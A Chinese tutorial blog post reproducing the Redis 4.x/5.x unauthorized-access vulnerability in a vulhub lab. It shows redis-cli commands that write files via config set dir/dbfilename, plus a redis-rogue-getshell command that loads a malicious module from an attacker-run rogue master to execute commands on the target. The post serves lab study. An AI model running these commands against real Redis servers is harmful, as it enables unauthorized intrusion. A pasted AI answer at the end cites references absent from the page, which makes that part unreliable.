Redis未授权访问漏洞实战

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

概述

​ 本文章主要是针对于vulhub靶场中的Redis 4.x/5.x 主从复制导致的命令执行进行复现,部分复现步骤可以参考vulhub靶场,这里我提供了利用POC工具验证的步骤,相比vulhub更加详细简单。

漏洞原理

Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。

本篇文章需要用到的工具下载地址

POC验证工具:unauthorized_com-main

EXP利用工具:redis-rogue-getshell-master

Redis概述

在复现未授权访问漏洞之前,我们有必要先大致的了解一下Redis是什么,Redis的简单使用与Redis未授权访问漏洞的危害。

Redis 介绍

Redis 是非关系型数据库系统,没有库表列的逻辑结构,仅仅以键值对的方式存储数据。

Redis 数据库经常用于Web 应用的缓存。

Redis 可以与文件系统进行交互。

Redis 监听TCP/6379

Redis 简单使用

Redis 未设置密码,客户端工具可以直接链接。

┌──(root㉿kali)-[~/…/vulhub/vulhub/redis/4-unacc]
└─# redis-cli -h 10.9.75.101
10.9.75.101:6379> set name yuanboss
OK
10.9.75.101:6379> get name
"yuanboss"
10.9.75.101:6379> config set dir /tmp/
OK
10.9.75.101:6379> config set dbfilename yuanboss.txt 
OK
10.9.75.101:6379> save
OK

Redis未授权漏洞危害

image-20230901184319687

漏洞复现

启动靶场环境

前往vulhub的redis/4-unacc目录执行以下命令启动靶场环境

docker-compose up -d

POC漏洞验证

通过我提供的POC验证工具对靶场的IP进行检测,查看是否具有未授权访问漏洞

image-20230901175612226

经过POC验证,存在redis未授权访问漏洞

EXP漏洞利用

通过我提供的EXP利用工具进行利用,由于这个靶场环境中的redis的版本范围是符合是是主从复制的,具有远程代码执行漏洞:

注意-r参数指的是目标的IP地址,-L是本机的IP地址,不要用本机的会换地址或者localhost

python3 redis-master.py -r 10.9.75.101 -p 6379 -L 10.9.75.101 -P 8888 -f RedisModulesSDK/exp.so -c "id" 

image-20230901181259340

可以看到我们利用RCE漏洞成功执行了linux中的 id命令

总结

​ 对于未授权访问漏洞,我们要具有敏锐的嗅觉,未授权访问一般都出现于中间件,比如 zookeeper,docker,redis,wordpress等中间件或者框架,看到这类的中间件或者框架,我们就应该想到是否不需要密码就能访问,这个时候我们就可以直接拿到我们的POC工具进行漏洞验证了,如果发现存在某个漏洞,我们就可以去网上找EXP或者自己编写EXP进行利用。

​ 所以未授权访问漏洞的本质其实就是中间件或者CMS框架没有这种密码,导致我们可以直接连接。

<think>好的,我现在需要帮助用户寻找关于未授权访问漏洞的靶场和学习资源。首先,我得回顾用户提供的引用内容,看看里面有没有相关的信息。用户提到了引用1到5,其中引用2、3、4、5都提到了靶场或者相关漏洞实战内容。比如引用2提到了Hadoop和Redis的靶场实战,引用3提到了访问特定路径获取信息,引用4提到了漏洞复现和GETSHELL的方法,引用5则介绍了WebGoat这个Java靶场程序。 接下来,我需要整理这些信息,给出用户具体的靶场资源。首先,Vulfocus在引用2和4中被提到,应该是一个综合靶场平台,支持多漏洞环境,包括Hadoop和Redis未授权访问。然后WebGoat在引用5里,虽然主要针对Web漏洞,但可能包含相关的内容。另外,用户可能需要自己搭建环境,比如用Docker部署Hadoop或Redis,这在引用3中提到过修复方法,可能搭建时需要注意安全配置。 然后,用户可能还需要学习资源,比如文章或实战指南。引用2和3的标题都涉及未授权访问漏洞的总结和实战,可以推荐相关的文章链接。另外,Metasploitable和DVWA虽然主要是其他漏洞,但可能也包含未授权访问的案例,需要确认一下。 还要注意用户提到的合规性问题,引用1强调了在非授权情况下进行渗透测试是不合法的,所以必须建议用户在本地搭建靶场,如引用4提到的靶场环境下载方式,或者在Vulfocus这样的平台上练习。 最后,要确保回答结构清晰,分点列出靶场推荐、学习资源、注意事项,并且每个部分都有具体的例子和引用来源。同时,生成的相关问题要围绕用户可能进一步的需求,比如漏洞原理、修复方法、搭建步骤等。</think>### 未授权访问漏洞靶场与学习资源推荐 #### 一、靶场环境推荐 1. **Vulfocus综合漏洞靶场** - 支持Hadoop、Redis、Kubernetes等未授权访问漏洞实战环境 - 提供一键启动的容器化靶场,可直接通过Web界面操作 - 示例漏洞复现: - Redis未授权访问导致GETSHELL(需配合SSH密钥写入)[^4] - Hadoop YARN未授权访问远程命令执行 - 平台地址:`https://vulfocus.cn/` [^2][^4] 2. **WebGoat靶场(OWASP官方)** - 包含访问控制缺陷相关实验(部分涉及未授权访问原理) - 提供30+安全实验课程,含视频演示和分步骤指导 - 项目地址:`https://github.com/WebGoat/WebGoat` [^5] 3. **自建环境(推荐)** - **Hadoop/YARN环境搭建**: ```bash docker pull sequenceiq/hadoop-docker docker run -it -p 8088:8088 sequenceiq/hadoop-docker /etc/bootstrap.sh -bash ``` - **Redis未授权环境**: ```bash docker run -d -p 6379:6379 redis --protected-mode no ``` - 注意:需关闭服务认证模块模拟漏洞[^3] #### 二、学习资源 1. **漏洞原理与实战文章** - 《Hadoop & Redis未授权访问漏洞分析与利用》 - 《Kubernetes API未授权访问漏洞修复指南》 2. **渗透测试方法论** - 未授权访问漏洞的发现路径: - 端口扫描 → 服务识别 → 尝试默认配置访问 → 利用工具验证 - 常用工具链:Nmap、Redis-cli、Metasploit(含Hadoop exploit模块) 3. **合规性注意事项** - 必须使用本地或授权靶场进行测试(如Vulfocus)[^1] - 禁止对非授权目标实施扫描/渗透操作 #### 三、典型漏洞修复方案 1. 强制启用认证机制(如Redis的`requirepass`)[^3] 2. 限制服务监听IP(如Hadoop绑定内网地址) 3. Kubernetes需配置`--anonymous-auth=false` 4. 使用网络ACL限制访问源(如云服务器安全组规则)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yuan_boss

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值